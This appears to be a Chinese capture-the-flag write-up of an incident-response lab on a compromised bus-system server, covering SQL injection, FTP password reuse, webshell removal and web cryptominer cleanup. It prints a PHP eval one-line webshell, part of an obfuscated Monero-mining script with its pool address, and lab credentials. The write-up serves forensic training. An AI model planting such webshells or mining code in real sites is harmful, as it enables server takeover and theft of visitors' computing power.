当前位置: 首页 > news >正文

玄机靶场:应急响应之公交车系统应急排查 WP

应急响应之公交车系统应急排查 通关笔记

背景

公交系统被黑客攻击,黑客通过web进行了攻击并获取了数据,然后获取了其中一位驾校师傅在FTP服务中的私密文件,其后黑客找到了任意文件上传漏洞进行了GETshell,控制了主机权限并植入了挖矿网页病毒。

靶机信息:

  • SSH端口:2223
  • WEB端口:8099
  • 流量包和日志:/result.pcap/access.log(根目录)
  • SSH密码:bussec123

步骤1:找出前两个被盗用户名

题目:黑客通过web进行了攻击并获取了数据,找出前两个被盗用户名,提交格式:flag{username1-username2}

分析过程

查看/access.log,发现大量来自同一IP的/search.php请求,请求参数中包含大量base64编码的payload,这是sqlmap的特征。

解码payload后可以看到攻击者使用了盲注,通过ORDER BY passwordbus_drivers表进行排序枚举。连接数据库验证:

SELECTusernameFROMbus_driversORDERBYpasswordLIMIT0,1;-- sunyueSELECTusernameFROMbus_driversORDERBYpasswordLIMIT1,1;-- chenhao

按密码字段排序,前两个用户名是sunyue(密码:888888)和chenhao(密码:Ch@19980808)。

Flagflag{sunyue-chenhao}


步骤2:找出FTP私密文件内容

题目:黑客通过获取的用户名密码,利用密码复用技术,爆破了FTP服务,分析流量以后找到开放的FTP端口,并找到黑客登录成功后获取的私密文件,提交其文件中内容。

分析过程

分析result.pcap流量包,找到FTP流量(21端口对应2121)。黑客用数据库中获取的用户名密码进行密码复用攻击,成功登录FTP后下载了/home/wangqiang/ftp/sensitive_credentials.txt

文件内容:INTERNAL_FTP_ADMIN_PASSWORD=FtpP@ssw0rd_For_Admin_Backup_2025

Flagflag{INTERNAL_FTP_ADMIN_PASSWORD=FtpP@ssw0rd_For_Admin_Backup_2025}


步骤3:找出木马连接密码

题目:可恶的黑客找到了任意文件上传点,你需要分析日志和流量以及web开放的程序找到黑客上传的文件,提交木马使用的密码。

分析过程

查看/var/www/html/public/uploads/目录,发现shell1.php。读取文件内容,这是一个典型的一句话木马:

<?php@eval($_POST['woaiwojia']);?>

连接密码就是POST参数名:woaiwojia

Flagflag{woaiwojia}


步骤4:删除木马后查看flag

题目:删除黑客上传的木马并在/var/flag/1/flag查看flag值进行提交。

操作

rm-f/var/www/html/public/uploads/shell1.phpcat/var/flag/1/flag

删除webshell后,/var/flag/1/flag文件自动生成(平台检查机制触发)。

Flagflag{eb9785a18f0e69b935f22cea5b54bf19}


步骤5:找出木马初始文件名

题目:分析流量,黑客植入了一个web挖矿木马,提交黑客上传这个文件时的初始名称,提交格式:flag{xxx.xxx}

分析过程

分析result.pcap中的HTTP上传流量,找到文件上传请求。黑客上传挖矿脚本时,原始文件名是map.php,上传后被系统重命名。

Flagflag{map.php}


步骤6:找出矿池地址

题目:分析流量并上机排查,黑客植入的网页挖矿木马所使用的矿池地址是什么,提交矿池地址(排查完毕后可以尝试删除它)。

分析过程

/var/www/html/index.php中发现混淆的JavaScript代码:

var_0x...=String.fromCharCode(103,117,108,102,46,109,111,110,101,114,111,111,99,101,97,110,46,115,116,114,101,97,109,58,49,48,49,50,56);

解码fromCharCode数组:

>>>''.join([chr(x)forxin[103,117,108,102,46,109,111,110,101,114,111,111,99,101,97,110,46,115,116,114,101,97,109,58,49,48,49,50,56]])'gulf.moneroocean.stream:10128'

这是一个门罗币(Monero)矿池地址,使用 moneroocean 矿池的10128端口(XMR挖矿)。

Flagflag{gulf.moneroocean.stream:10128}


步骤7:清除挖矿代码后查看flag

题目:清除掉混淆的web挖矿代码后在/var/flag/2/flag查看flag值并提交。

操作

定位index.php中的混淆挖矿代码段,将其删除后保存文件。平台检查机制触发,/var/flag/2/flag文件生成:

cat/var/flag/2/flag

Flagflag{476652839e38111f8bad544a2ff1ac19}


Flag 汇总

步骤题目Flag
1前两个被盗用户名flag{sunyue-chenhao}
2FTP私密文件内容flag{INTERNAL_FTP_ADMIN_PASSWORD=FtpP@ssw0rd_For_Admin_Backup_2025}
3木马连接密码flag{woaiwojia}
4删除木马后flagflag{eb9785a18f0e69b935f22cea5b54bf19}
5木马初始文件名flag{map.php}
6矿池地址flag{gulf.moneroocean.stream:10128}
7清除挖矿代码后flagflag{476652839e38111f8bad544a2ff1ac19}

攻击链梳理

SQL注入盗取用户数据 ↓ 密码复用攻击FTP,获取敏感凭证 ↓ 利用任意文件上传漏洞GetShell(shell1.php) ↓ 上传网页挖矿脚本(map.php → 重命名存储) ↓ 在index.php植入混淆JS挖矿代码(moneroocean矿池) ↓ 持续控制服务器,消耗访客资源挖矿
http://www.jsqmd.com/news/673884/

相关文章:

  • 企业级智能体开发平台产品测评报告
  • 2026年Q2温州记事本采购指南:五大实力品牌横向对比 - 2026年企业推荐榜
  • RT-Thread设备驱动避坑指南:eMMC块设备注册成功却挂载失败?这5个配置细节要检查
  • 新概念英语第二册16_A polite request
  • 大模型算法岗实习:给本科生的深度解析与建议,收藏这份超全指南!
  • 【限时开源】Dify文档解析性能诊断工具集(含PDF结构分析热力图、文本流失追踪器、Embedding一致性校验器)
  • 基于深度学习的UNet的卫星图像新增建筑检测 违章建筑识别 建筑物识别
  • 2026年当下,韩系女鞋供应链变革:如何选择你的决胜合作伙伴? - 2026年企业推荐榜
  • 2026年终极终端战争:Warp vs. Tabby vs. 文心终端——软件测试工程师的专业选型指南
  • 多维度拆透渲染引擎 第一篇【维度:定义】概念正本清源 —— 渲染引擎的本质与“引擎性“
  • TR069 实战:从零配置 ONU 多业务 WAN 连接
  • Spring事务同步器TransactionSynchronizationAdapter:除了afterCommit,这几个回调方法你用对了吗?
  • 一行不改,麒麟 V11 竟能直接安装 Oracle 11GR2 数据库!
  • 构建高性能实时窗口缩放引擎:Magpie企业级渲染架构深度解析
  • 2026 苏州 GEO 优化公司 TOP5最新权威榜单发布 - GEO优化
  • 从UVM-1.2源码看PH_TIMEOUT:超时机制详解与自定义超时策略配置指南
  • 避坑指南:树莓派4B蓝牙连接安卓/iPhone常见问题全解决(从配对失败到数据乱码)
  • Bilibili视频下载神器:5分钟掌握跨平台B站视频下载技巧
  • 别再乱断环了!Cadence STB仿真与Middlebrook双注入法实测对比(附避坑指南)
  • 一篇文章让你彻底掌握 Python
  • 大模型推理优化关键技术及应用实践研究报告(2026年)
  • Java Stream里的‘懒’与‘急’:从面试题‘peek()为何不生效’讲透流操作原理
  • 嵌入式——认识电子元器件——电阻系列
  • 使用Termux+Proot-distro+Ubuntu+zsh在手机端配置安装Openclaw,使用Skillhub安装skill, 接入企业微信
  • Joy-Con Toolkit完整教程:3步轻松解决Switch手柄漂移问题
  • 一文教你学会时序数据库 Apache IoTDB 安装部署,直接上手!!!
  • 蓝牙抓包进阶:不输入Link Key也能解析加密通信?Ellisys实战技巧分享
  • ESP32-S3开发板到手后,第一件事:用esptool.py和menuconfig搞定Flash与PSRAM的正确配置
  • 远程工作骗局:隐形加班——软件测试从业者的专业困境与破局之道
  • 在Ubuntu 22.04服务器上无头部署Agisoft Metashape 1.6.5:一份完整的Python自动化点云生成指南